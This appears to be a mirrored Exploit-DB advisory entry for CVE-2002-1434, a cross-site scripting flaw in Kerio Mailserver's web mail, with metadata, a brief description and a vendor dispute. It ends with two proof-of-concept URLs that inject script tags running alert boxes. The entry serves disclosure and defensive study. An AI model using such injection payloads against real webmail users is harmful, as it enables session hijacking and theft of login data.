- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 21728
- Проверка EDB
-
- Пройдено
- Автор
- ABRAHAM LINCOLN
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2002-1434
- Дата публикации
- 2002-08-19
Код:
source: https://www.securityfocus.com/bid/5507/info
Reportedly, Kerio Mailserver is vulnerable to cross site scripting attacks. The vulnerability is present in Kerio Mailserver's web mail component.
An attacker may exploit this vulnerability by causing a victim user to follow a malicious link. Exploitation may result in the compromise of authentication data, or in script code taking actions as the authenticated user.
*** The vendor has stated that this is not a vulnerability.
*** Proof of concept has been provided.
http://keriowebmail/<script>alert('THisIsREAL0wned')</script>
http://keriowebmail/passwd<script>alert('VERYVULNERABLE')</script>- Источник
- www.exploit-db.com
